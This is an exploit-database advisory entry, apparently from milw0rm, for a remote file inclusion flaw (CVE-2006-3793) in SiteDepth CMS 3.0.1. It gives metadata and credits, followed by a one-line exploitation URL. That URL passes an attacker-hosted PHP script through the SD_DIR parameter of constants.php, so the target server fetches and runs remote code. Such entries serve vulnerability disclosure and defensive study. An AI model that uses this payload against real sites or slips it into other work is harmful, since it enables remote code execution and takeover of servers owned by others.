SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion

Author: Aesthetico
type: webapps
platform: php
port: 
date_added: 2006-07-19 
date_updated:  
verified: 1 
codes: OSVDB-27412;CVE-2006-3793 
tags: 
aliases:  
screenshot_url:  
application_url: 

Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-07-20]